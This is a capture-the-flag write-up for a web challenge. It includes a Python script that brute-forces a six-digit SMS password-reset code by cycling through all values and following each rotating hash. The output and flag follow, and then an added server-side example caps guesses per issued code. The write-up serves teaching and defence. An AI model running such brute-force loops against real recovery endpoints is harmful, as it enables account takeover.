Admin
[web]
Admin
I'm not an expert, but it seems to me that something needs to be hacked here
Recon
The forgot-password link triggers a JavaScript alert:
A six-digit secret code has been sent to your number. Enter the code from SMS:
It expects you to enter the 6-digit code from the SMS.
Bruteforce
We tried brute-forcing the MD5 hash locally with various inputs, but this did not work.
Solution
#!/usr/bin/python
# Python 2 script (print statements, xrange).
import requests

# Start the restore flow; the response carries the first hash.
r = requests.post("http://sherlock-message.ru/api/admin.restore").json()
cur_hash = r['response']['new_hash']

for i in xrange(0, 1000000):  # 000000 through 999999
    v = "%06d" % (i)
    print "TRYING %s.." % (v)
    d = { "hash": cur_hash, 'sms_code': v }
    r = requests.post("http://sherlock-message.ru/api/admin.restore", data=d).json()
    print r
    if r['response']['need_sms'] == False:
        print "GOT IT!!"
        print r
        exit(0)
    # Each failed attempt returns a new hash to send with the next guess.
    cur_hash = r['response']['new_hash']
We brute-forced the SMS code online with the above script. Eventually we received the response:
{u'status': u'success', u'response': {u'need_sms': False, u'message': u'FLAG{bruTe_with_hash_f0rce}'}}
Flag
FLAG{bruTe_with_hash_f0rce}
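The script above could submit guess after guess simply by following each new_hash. The following is an added example, not part of the original writeup or the challenge's code, of a server-side check that ties a guess budget to the issued code instead of to the rotating hash; the class, the "error" field and the limits are assumptions, and only need_sms and new_hash come from the responses shown above.

```python
import hmac
import secrets
import time

MAX_ATTEMPTS = 5        # assumed policy: guesses allowed per issued code
CODE_TTL_SECONDS = 300  # assumed policy: lifetime of an issued code


class RestoreSessions:
    """Hypothetical server-side state for an admin.restore-style flow."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._by_hash = {}  # current hash -> session record

    def start(self):
        """Issue a fresh code; returns (hash, code). The code would go out by SMS."""
        code = "%06d" % secrets.randbelow(10**6)
        record = {"code": code, "left": MAX_ATTEMPTS,
                  "expires": self._clock() + CODE_TTL_SECONDS}
        new_hash = secrets.token_hex(16)
        self._by_hash[new_hash] = record
        return new_hash, code

    def verify(self, cur_hash, sms_code):
        """Check one guess; the response mirrors the need_sms/new_hash fields."""
        # The hash is single use: pop it so a replayed request finds nothing.
        record = self._by_hash.pop(cur_hash, None)
        if record is None or self._clock() >= record["expires"]:
            return {"need_sms": True, "error": "restart"}
        # Spend the attempt before comparing, so every guess costs budget.
        record["left"] -= 1
        if hmac.compare_digest(record["code"].encode(),
                               str(sms_code).encode()):
            return {"need_sms": False}
        if record["left"] <= 0:
            # Budget exhausted: the code is discarded together with the record.
            return {"need_sms": True, "error": "locked"}
        # Rotating the hash keeps the SAME record, so the counter carries over.
        new_hash = secrets.token_hex(16)
        self._by_hash[new_hash] = record
        return {"need_sms": True, "new_hash": new_hash}
```

With this budget a sequential walk of the six-digit space stops after five guesses per code. Calls to start() need their own per-account rate limit, otherwise a client can simply request a new code and keep guessing.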